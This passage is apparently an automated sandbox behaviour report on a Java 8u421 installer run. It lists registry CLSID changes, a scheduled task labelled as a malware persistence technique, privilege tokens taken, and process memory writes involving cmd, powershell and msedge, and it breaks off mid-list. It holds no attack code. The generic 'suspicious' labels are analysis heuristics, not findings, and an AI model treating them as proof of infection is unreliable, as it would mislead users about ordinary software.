\REGISTRY\USER\.DEFAULT\Software\Classes\CLSID\{CAFEEFAC-0017-0000-0228-ABCDEFFEDCBA}\InprocServer32\ = "C:\\Program Files (x86)\\Java\\jre1.8.0_421\\bin\\jp2iexp.dll" installer.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\CLSID\{CAFEEFAC-0018-0000-0386-ABCDEFFEDCBB}\INPROCSERVER32 installer.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\CLSID\{CAFEEFAC-0017-0000-0305-ABCDEFFEDCBC}\INPROCSERVER32 installer.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\CLSID\{CAFEEFAC-0018-0000-0038-ABCDEFFEDCBA}\INPROCSERVER32 installer.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\CLSID\{CAFEEFAC-0016-0000-0171-ABCDEFFEDCBB}\ = "Java Plug-in 1.6.0_171" installer.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\CLSID\{CAFEEFAC-0017-0000-0309-ABCDEFFEDCBC}\InprocServer32\ = "C:\\Program Files (x86)\\Java\\jre1.8.0_421\\bin\\jp2iexp.dll" installer.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\CLSID\{CAFEEFAC-0018-0000-0153-ABCDEFFEDCBB} installer.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\CLSID\{CAFEEFAC-0016-0000-0003-ABCDEFFEDCBB}\InprocServer32\ThreadingModel = "Apartment" installer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\CLSID\{CAFEEFAC-0018-0000-0288-ABCDEFFEDCBB} installer.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\CLSID\{CAFEEFAC-0018-0000-0320-ABCDEFFEDCBA}\INPROCSERVER32 installer.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\CLSID\{CAFEEFAC-0018-0000-0325-ABCDEFFEDCBC}\INPROCSERVER32 installer.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\CLSID\{CAFEEFAC-0014-0002-0041-ABCDEFFEDCBB}\InprocServer32\ = "C:\\Program Files (x86)\\Java\\jre1.8.0_421\\bin\\jp2iexp.dll" installer.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\CLSID\{CAFEEFAC-0014-0002-0050-ABCDEFFEDCBB}\ = "Java Plug-in 1.4.2_50" installer.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\CLSID\{CAFEEFAC-0016-0000-0143-ABCDEFFEDCBA}\InprocServer32\ThreadingModel = "Apartment" installer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\CLSID\{CAFEEFAC-0018-0000-0136-ABCDEFFEDCBC} installer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\CLSID\{CAFEEFAC-0014-0002-0056-ABCDEFFEDCBB} installer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\CLSID\{CAFEEFAC-0017-0000-0422-ABCDEFFEDCBC} installer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\CLSID\{CAFEEFAC-0018-0000-0282-ABCDEFFEDCBC}\InprocServer32 installer.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\CLSID\{CAFEEFAC-0016-0000-0205-ABCDEFFEDCBA}\ = "Java Plug-in 1.6.0_205" installer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\CLSID\{CAFEEFAC-0018-0000-0044-ABCDEFFEDCBB} installer.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\CLSID\{CAFEEFAC-0016-0000-0195-ABCDEFFEDCBB}\ = "Java Plug-in 1.6.0_195" installer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\CLSID\{CAFEEFAC-0018-0000-0397-ABCDEFFEDCBC} installer.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\CLSID\{CAFEEFAC-0015-0000-0019-ABCDEFFEDCBB}\InprocServer32\ThreadingModel = "Apartment" installer.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\CLSID\{CAFEEFAC-0014-0002-0070-ABCDEFFEDCBA} installer.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\CLSID\{CAFEEFAC-0018-0000-0021-ABCDEFFEDCBB}\INPROCSERVER32 installer.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\CLSID\{CAFEEFAC-0018-0000-0139-ABCDEFFEDCBA}\INPROCSERVER32 installer.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\CLSID\{CAFEEFAC-0016-0000-0016-ABCDEFFEDCBC}\InprocServer32\ = "C:\\Program Files (x86)\\Java\\jre1.8.0_421\\bin\\jp2iexp.dll" installer.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\CLSID\{CAFEEFAC-0017-0000-0167-ABCDEFFEDCBA}\InprocServer32\ = "C:\\Program Files (x86)\\Java\\jre1.8.0_421\\bin\\jp2iexp.dll" installer.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\CLSID\{CAFEEFAC-0018-0000-0255-ABCDEFFEDCBB}\INPROCSERVER32 installer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\CLSID\{CAFEEFAC-0018-0000-0125-ABCDEFFEDCBC} installer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\CLSID\{CAFEEFAC-0018-0000-0248-ABCDEFFEDCBB} installer.exe -
Modifies registry class 64 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\WOW6432Node\CLSID\{CAFEEFAC-0017-0000-0053-ABCDEFFEDCBA}\InprocServer32 ssvagent.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\WOW6432Node\CLSID\{CAFEEFAC-0017-0000-0108-ABCDEFFEDCBB}\InprocServer32 ssvagent.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\WOW6432Node\CLSID\{CAFEEFAC-0018-0000-0194-ABCDEFFEDCBA}\InprocServer32\ThreadingModel = "Apartment" ssvagent.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CAFEEFAC-0017-0000-0216-ABCDEFFEDCBA}\InprocServer32 installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CAFEEFAC-0018-0000-0066-ABCDEFFEDCBC} installer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\WOW6432Node\CLSID\{CAFEEFAC-0018-0000-0173-ABCDEFFEDCBB}\InprocServer32\ = "C:\\Program Files (x86)\\Java\\jre1.8.0_421\\bin\\jp2iexp.dll" ssvagent.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CAFEEFAC-0018-0000-0265-ABCDEFFEDCBB}\InprocServer32 installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CAFEEFAC-0018-0000-0329-ABCDEFFEDCBC}\InprocServer32 installer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\WOW6432Node\CLSID\{CAFEEFAC-0016-0000-0085-ABCDEFFEDCBC}\ = "Java Plug-in 1.6.0_85" ssvagent.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\WOW6432Node\CLSID\{CAFEEFAC-0017-0000-0242-ABCDEFFEDCBC}\InprocServer32\ = "C:\\Program Files (x86)\\Java\\jre1.8.0_421\\bin\\jp2iexp.dll" ssvagent.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\WOW6432Node\CLSID\{CAFEEFAC-0018-0000-0081-ABCDEFFEDCBC}\InprocServer32 ssvagent.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\WOW6432Node\CLSID\{CAFEEFAC-0018-0000-0399-ABCDEFFEDCBB}\InprocServer32\ThreadingModel = "Apartment" ssvagent.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\WOW6432Node\CLSID\{CAFEEFAC-0013-0001-0007-ABCDEFFEDCBA}\ = "Java Plug-in 1.3.1_07" ssvagent.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\WOW6432Node\CLSID\{CAFEEFAC-0015-0000-0068-ABCDEFFEDCBB} ssvagent.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CAFEEFAC-0018-0000-0028-ABCDEFFEDCBC}\ = "Java Plug-in 1.8.0_28" installer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\WOW6432Node\CLSID\{CAFEEFAC-0013-0001-0049-ABCDEFFEDCBA}\InprocServer32\ = "C:\\Program Files (x86)\\Java\\jre1.8.0_421\\bin\\jp2iexp.dll" ssvagent.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\WOW6432Node\CLSID\{CAFEEFAC-0015-0000-0025-ABCDEFFEDCBC}\InprocServer32 ssvagent.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\WOW6432Node\CLSID\{CAFEEFAC-0017-0000-0045-ABCDEFFEDCBA}\InprocServer32\ThreadingModel = "Apartment" ssvagent.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\WOW6432Node\CLSID\{CAFEEFAC-0017-0000-0311-ABCDEFFEDCBB}\InprocServer32\ = "C:\\Program Files (x86)\\Java\\jre1.8.0_421\\bin\\jp2iexp.dll" ssvagent.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\WOW6432Node\CLSID\{CAFEEFAC-0017-0000-0364-ABCDEFFEDCBC}\InprocServer32\ = "C:\\Program Files (x86)\\Java\\jre1.8.0_421\\bin\\jp2iexp.dll" ssvagent.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CAFEEFAC-0016-0000-0119-ABCDEFFEDCBA}\InprocServer32 installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CAFEEFAC-0017-0000-0244-ABCDEFFEDCBA} installer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\WOW6432Node\CLSID\{CAFEEFAC-0016-0000-0203-ABCDEFFEDCBA}\InprocServer32\ = "C:\\Program Files (x86)\\Java\\jre1.8.0_421\\bin\\jp2iexp.dll" ssvagent.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\WOW6432Node\CLSID\{CAFEEFAC-0018-0000-0275-ABCDEFFEDCBC}\ = "Java Plug-in 1.8.0_275" ssvagent.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\WOW6432Node\CLSID\{CAFEEFAC-0016-0000-0037-ABCDEFFEDCBA} ssvagent.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\WOW6432Node\CLSID\{CAFEEFAC-0016-0000-0178-ABCDEFFEDCBC}\ = "Java Plug-in 1.6.0_178" ssvagent.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\WOW6432Node\CLSID\{CAFEEFAC-0017-0000-0168-ABCDEFFEDCBA}\InprocServer32 ssvagent.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\WOW6432Node\CLSID\{CAFEEFAC-0018-0000-0143-ABCDEFFEDCBB}\InprocServer32 ssvagent.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\WOW6432Node\CLSID\{CAFEEFAC-0018-0000-0148-ABCDEFFEDCBC}\InprocServer32\ThreadingModel = "Apartment" ssvagent.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CAFEEFAC-0013-0001-0083-ABCDEFFEDCBB}\InprocServer32\ = "C:\\Program Files (x86)\\Java\\jre1.8.0_421\\bin\\jp2iexp.dll" installer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CAFEEFAC-0014-0002-0092-ABCDEFFEDCBB}\ = "Java Plug-in 1.4.2_92" installer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CAFEEFAC-0016-0000-0006-ABCDEFFEDCBB}\InprocServer32\ThreadingModel = "Apartment" installer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\WOW6432Node\CLSID\{CAFEEFAC-0017-0000-0032-ABCDEFFEDCBA}\InprocServer32\ = "C:\\Program Files (x86)\\Java\\jre1.8.0_421\\bin\\jp2iexp.dll" ssvagent.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CAFEEFAC-0017-0000-0380-ABCDEFFEDCBC} installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CAFEEFAC-0017-0000-0386-ABCDEFFEDCBB}\InprocServer32 installer.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\WOW6432Node\CLSID\{CAFEEFAC-0013-0001-0079-ABCDEFFEDCBB}\InprocServer32 ssvagent.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\WOW6432Node\CLSID\{CAFEEFAC-0016-0000-0133-ABCDEFFEDCBB} ssvagent.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\WOW6432Node\CLSID\{CAFEEFAC-0018-0000-0083-ABCDEFFEDCBC} ssvagent.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\WOW6432Node\CLSID\{CAFEEFAC-0018-0000-0220-ABCDEFFEDCBA} ssvagent.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{5852F5ED-8BF4-11D4-A245-0080C6F74284}\InprocServer32\ = "C:\\Program Files (x86)\\Java\\jre1.8.0_421\\bin\\wsdetect.dll" installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CAFEEFAC-0017-0000-0342-ABCDEFFEDCBB}\InprocServer32 installer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\WOW6432Node\CLSID\{CAFEEFAC-0015-0000-0075-ABCDEFFEDCBA}\InprocServer32\ = "C:\\Program Files (x86)\\Java\\jre1.8.0_421\\bin\\jp2iexp.dll" ssvagent.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\WOW6432Node\CLSID\{CAFEEFAC-0017-0000-0136-ABCDEFFEDCBB}\InprocServer32\ = "C:\\Program Files (x86)\\Java\\jre1.8.0_421\\bin\\jp2iexp.dll" ssvagent.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CAFEEFAC-0013-0001-0023-ABCDEFFEDCBB}\InprocServer32\ThreadingModel = "Apartment" installer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CAFEEFAC-0017-0000-0148-ABCDEFFEDCBA}\InprocServer32\ = "C:\\Program Files (x86)\\Java\\jre1.8.0_421\\bin\\jp2iexp.dll" installer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CAFEEFAC-0018-0000-0092-ABCDEFFEDCBB}\InprocServer32\ThreadingModel = "Apartment" installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CAFEEFAC-0018-0000-0220-ABCDEFFEDCBB} installer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\WOW6432Node\CLSID\{CAFEEFAC-0016-0000-0038-ABCDEFFEDCBC}\InprocServer32\ = "C:\\Program Files (x86)\\Java\\jre1.8.0_421\\bin\\jp2iexp.dll" ssvagent.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\WOW6432Node\CLSID\{CAFEEFAC-0016-0000-0120-ABCDEFFEDCBB}\InprocServer32\ = "C:\\Program Files (x86)\\Java\\jre1.8.0_421\\bin\\jp2iexp.dll" ssvagent.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\WOW6432Node\CLSID\{CAFEEFAC-0016-0000-0213-ABCDEFFEDCBA} ssvagent.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\WOW6432Node\CLSID\{CAFEEFAC-0017-0000-0085-ABCDEFFEDCBB}\InprocServer32\ = "C:\\Program Files (x86)\\Java\\jre1.8.0_421\\bin\\jp2iexp.dll" ssvagent.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CAFEEFAC-0016-0000-0192-ABCDEFFEDCBC}\InprocServer32\ = "C:\\Program Files (x86)\\Java\\jre1.8.0_421\\bin\\jp2iexp.dll" installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CAFEEFAC-0017-0000-0141-ABCDEFFEDCBB} installer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\WOW6432Node\CLSID\{CAFEEFAC-0018-0000-0337-ABCDEFFEDCBB}\InprocServer32\ThreadingModel = "Apartment" ssvagent.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\WOW6432Node\CLSID\{CAFEEFAC-0016-0000-0012-ABCDEFFEDCBC}\ = "Java Plug-in 1.6.0_12" ssvagent.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\WOW6432Node\CLSID\{CAFEEFAC-0018-0000-0156-ABCDEFFEDCBC}\InprocServer32\ThreadingModel = "Apartment" ssvagent.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\WOW6432Node\CLSID\{CAFEEFAC-0018-0000-0342-ABCDEFFEDCBA}\InprocServer32\ThreadingModel = "Apartment" ssvagent.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CAFEEFAC-0016-0000-0133-ABCDEFFEDCBB}\ = "Java Plug-in 1.6.0_133" installer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CAFEEFAC-0018-0000-0193-ABCDEFFEDCBA}\ = "Java Plug-in 1.8.0_193" installer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CAFEEFAC-0017-0000-0091-ABCDEFFEDCBA}\InprocServer32\ = "C:\\Program Files (x86)\\Java\\jre1.8.0_421\\bin\\jp2iexp.dll" installer.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\WOW6432Node\CLSID\{CAFEEFAC-0013-0001-0016-ABCDEFFEDCBA}\InprocServer32 ssvagent.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\WOW6432Node\CLSID\{CAFEEFAC-0017-0000-0101-ABCDEFFEDCBA} ssvagent.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\WOW6432Node\CLSID\{CAFEEFAC-0017-0000-0207-ABCDEFFEDCBA}\InprocServer32\ThreadingModel = "Apartment" ssvagent.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\WOW6432Node\CLSID\{CAFEEFAC-0017-0000-0410-ABCDEFFEDCBC}\InprocServer32\ = "C:\\Program Files (x86)\\Java\\jre1.8.0_421\\bin\\jp2iexp.dll" ssvagent.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4664 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 35 IoCs
pid Process 4180 powershell.exe 4180 powershell.exe 2864 powershell.exe 2864 powershell.exe 1576 powershell.exe 1576 powershell.exe 1016 powershell.exe 1016 powershell.exe 2312 msedge.exe 2312 msedge.exe 2172 msedge.exe 2172 msedge.exe 4564 identity_helper.exe 4564 identity_helper.exe 2416 msiexec.exe 2416 msiexec.exe 5268 javaws.exe 5268 javaws.exe 2180 jp2launcher.exe 2180 jp2launcher.exe 5676 javaws.exe 5676 javaws.exe 5692 jp2launcher.exe 5692 jp2launcher.exe 2416 msiexec.exe 2416 msiexec.exe 2416 msiexec.exe 2416 msiexec.exe 2864 powershell.exe 2864 powershell.exe 2864 powershell.exe 5864 msedge.exe 5864 msedge.exe 5864 msedge.exe 5864 msedge.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
pid Process 2172 msedge.exe 2172 msedge.exe 2172 msedge.exe 2172 msedge.exe 2172 msedge.exe 2172 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4180 powershell.exe Token: SeDebugPrivilege 2864 powershell.exe Token: SeDebugPrivilege 1576 powershell.exe Token: SeDebugPrivilege 1016 powershell.exe Token: SeShutdownPrivilege 4944 JavaSetup8u421.exe Token: SeIncreaseQuotaPrivilege 4944 JavaSetup8u421.exe Token: SeSecurityPrivilege 2416 msiexec.exe Token: SeCreateTokenPrivilege 4944 JavaSetup8u421.exe Token: SeAssignPrimaryTokenPrivilege 4944 JavaSetup8u421.exe Token: SeLockMemoryPrivilege 4944 JavaSetup8u421.exe Token: SeIncreaseQuotaPrivilege 4944 JavaSetup8u421.exe Token: SeMachineAccountPrivilege 4944 JavaSetup8u421.exe Token: SeTcbPrivilege 4944 JavaSetup8u421.exe Token: SeSecurityPrivilege 4944 JavaSetup8u421.exe Token: SeTakeOwnershipPrivilege 4944 JavaSetup8u421.exe Token: SeLoadDriverPrivilege 4944 JavaSetup8u421.exe Token: SeSystemProfilePrivilege 4944 JavaSetup8u421.exe Token: SeSystemtimePrivilege 4944 JavaSetup8u421.exe Token: SeProfSingleProcessPrivilege 4944 JavaSetup8u421.exe Token: SeIncBasePriorityPrivilege 4944 JavaSetup8u421.exe Token: SeCreatePagefilePrivilege 4944 JavaSetup8u421.exe Token: SeCreatePermanentPrivilege 4944 JavaSetup8u421.exe Token: SeBackupPrivilege 4944 JavaSetup8u421.exe Token: SeRestorePrivilege 4944 JavaSetup8u421.exe Token: SeShutdownPrivilege 4944 JavaSetup8u421.exe Token: SeDebugPrivilege 4944 JavaSetup8u421.exe Token: SeAuditPrivilege 4944 JavaSetup8u421.exe Token: SeSystemEnvironmentPrivilege 4944 JavaSetup8u421.exe Token: SeChangeNotifyPrivilege 4944 JavaSetup8u421.exe Token: SeRemoteShutdownPrivilege 4944 JavaSetup8u421.exe Token: SeUndockPrivilege 4944 JavaSetup8u421.exe Token: SeSyncAgentPrivilege 4944 JavaSetup8u421.exe Token: SeEnableDelegationPrivilege 4944 JavaSetup8u421.exe Token: SeManageVolumePrivilege 4944 JavaSetup8u421.exe Token: SeImpersonatePrivilege 4944 JavaSetup8u421.exe Token: SeCreateGlobalPrivilege 4944 JavaSetup8u421.exe Token: SeRestorePrivilege 2416 msiexec.exe Token: SeTakeOwnershipPrivilege 2416 msiexec.exe Token: SeRestorePrivilege 2416 msiexec.exe Token: SeTakeOwnershipPrivilege 2416 msiexec.exe Token: SeRestorePrivilege 2416 msiexec.exe Token: SeTakeOwnershipPrivilege 2416 msiexec.exe Token: SeRestorePrivilege 2416 msiexec.exe Token: SeTakeOwnershipPrivilege 2416 msiexec.exe Token: SeRestorePrivilege 2416 msiexec.exe Token: SeTakeOwnershipPrivilege 2416 msiexec.exe Token: SeRestorePrivilege 2416 msiexec.exe Token: SeTakeOwnershipPrivilege 2416 msiexec.exe Token: SeRestorePrivilege 2416 msiexec.exe Token: SeTakeOwnershipPrivilege 2416 msiexec.exe Token: SeRestorePrivilege 2416 msiexec.exe Token: SeTakeOwnershipPrivilege 2416 msiexec.exe Token: SeRestorePrivilege 2416 msiexec.exe Token: SeTakeOwnershipPrivilege 2416 msiexec.exe Token: SeRestorePrivilege 2416 msiexec.exe Token: SeTakeOwnershipPrivilege 2416 msiexec.exe Token: SeRestorePrivilege 2416 msiexec.exe Token: SeTakeOwnershipPrivilege 2416 msiexec.exe Token: SeRestorePrivilege 2416 msiexec.exe Token: SeTakeOwnershipPrivilege 2416 msiexec.exe Token: SeRestorePrivilege 2416 msiexec.exe Token: SeTakeOwnershipPrivilege 2416 msiexec.exe Token: SeRestorePrivilege 2416 msiexec.exe Token: SeTakeOwnershipPrivilege 2416 msiexec.exe -
Suspicious use of FindShellTrayWindow 27 IoCs
pid Process 4180 powershell.exe 2864 powershell.exe 2172 msedge.exe 2172 msedge.exe 2172 msedge.exe 2172 msedge.exe 2172 msedge.exe 2172 msedge.exe 2172 msedge.exe 2172 msedge.exe 2172 msedge.exe 2172 msedge.exe 2172 msedge.exe 2172 msedge.exe 2172 msedge.exe 2172 msedge.exe 2172 msedge.exe 2172 msedge.exe 2172 msedge.exe 2172 msedge.exe 2172 msedge.exe 2172 msedge.exe 2172 msedge.exe 2172 msedge.exe 2172 msedge.exe 2172 msedge.exe 2172 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 2172 msedge.exe 2172 msedge.exe 2172 msedge.exe 2172 msedge.exe 2172 msedge.exe 2172 msedge.exe 2172 msedge.exe 2172 msedge.exe 2172 msedge.exe 2172 msedge.exe 2172 msedge.exe 2172 msedge.exe 2172 msedge.exe 2172 msedge.exe 2172 msedge.exe 2172 msedge.exe 2172 msedge.exe 2172 msedge.exe 2172 msedge.exe 2172 msedge.exe 2172 msedge.exe 2172 msedge.exe 2172 msedge.exe 2172 msedge.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2180 jp2launcher.exe 5692 jp2launcher.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2616 wrote to memory of 4180 2616 cmd.exe 84 PID 2616 wrote to memory of 4180 2616 cmd.exe 84 PID 2616 wrote to memory of 1264 2616 cmd.exe 85 PID 2616 wrote to memory of 1264 2616 cmd.exe 85 PID 2616 wrote to memory of 2864 2616 cmd.exe 86 PID 2616 wrote to memory of 2864 2616 cmd.exe 86 PID 2616 wrote to memory of 1576 2616 cmd.exe 87 PID 2616 wrote to memory of 1576 2616 cmd.exe 87 PID 1576 wrote to memory of 2172 1576 powershell.exe 88 PID 1576 wrote to memory of 2172 1576 powershell.exe 88 PID 2172 wrote to memory of 2476 2172 msedge.exe 89 PID 2172 wrote to memory of 2476 2172 msedge.exe 89 PID 2616 wrote to memory of 1016 2616 cmd.exe 90 PID 2616 wrote to memory of 1016 2616 cmd.exe 90 PID 2172 wrote to memory of 3776 2172 msedge.exe 91 PID 2172 wrote to memory of 3776 2172 msedge.exe 91 PID 2172 wrote to memory of 3776 2172 msedge.exe 91 PID 2172 wrote to memory of 3776 2172 msedge.exe 91 PID 2172 wrote to memory of 3776 2172 msedge.exe 91 PID 2172 wrote to memory of 3776 2172 msedge.exe 91 PID 2172 wrote to memory of 3776 2172 msedge.exe 91 PID 2172 wrote to memory of 3776 2172 msedge.exe 91 PID 2172 wrote to memory of 3776 2172 msedge.exe 91 PID 2172 wrote to memory of 3776 2172 msedge.exe 91 PID 2172 wrote to memory of 3776 2172 msedge.exe 91 PID 2172 wrote to memory of 3776 2172 msedge.exe 91 PID 2172 wrote to memory of 3776 2172 msedge.exe 91 PID 2172 wrote to memory of 3776 2172 msedge.exe 91 PID 2172 wrote to memory of 3776 2172 msedge.exe 91 PID 2172 wrote to memory of 3776 2172 msedge.exe 91 PID 2172 wrote to memory of 3776 2172 msedge.exe 91 PID 2172 wrote to memory of 3776 2172 msedge.exe 91 PID 2172 wrote to memory of 3776 2172 msedge.exe 91 PID 2172 wrote to memory of 3776 2172 msedge.exe 91 PID 2172 wrote to memory of 3776 2172 msedge.exe 91 PID 2172 wrote to memory of 3776 2172 msedge.exe 91 PID 2172 wrote to memory of 3776 2172 msedge.exe 91 PID 2172 wrote to memory of 3776 2172 msedge.exe 91 PID 2172 wrote to memory of 3776 2172 msedge.exe 91 PID 2172 wrote to memory of 3776 2172 msedge.exe 91 PID 2172 wrote to memory of 3776 2172 msedge.exe 91 PID 2172 wrote to memory of 3776 2172 msedge.exe 91 PID 2172 wrote to memory of 3776 2172 msedge.exe 91 PID 2172 wrote to memory of 3776 2172 msedge.exe 91 PID 2172 wrote to memory of 3776 2172 msedge.exe 91 PID 2172 wrote to memory of 3776 2172 msedge.exe 91 PID 2172 wrote to memory of 3776 2172 msedge.exe 91 PID 2172 wrote to memory of 3776 2172 msedge.exe 91 PID 2172 wrote to memory of 3776 2172 msedge.exe 91 PID 2172 wrote to memory of 3776 2172 msedge.exe 91 PID 2172 wrote to memory of 3776 2172 msedge.exe 91 PID 2172 wrote to memory of 3776 2172 msedge.exe 91 PID 2172 wrote to memory of 3776 2172 msedge.exe 91 PID 2172 wrote to memory of 3776 2172 msedge.exe 91 PID 2172 wrote to memory of 2312 2172 msedge.exe 92 PID 2172 wrote to memory of 2312 2172 msedge.exe 92 PID 2172 wrote to memory of 912 2172 msedge.exe 93 PID 2172 wrote to memory of 912 2172 msedge.exe 93 PID 2172 wrote to memory of 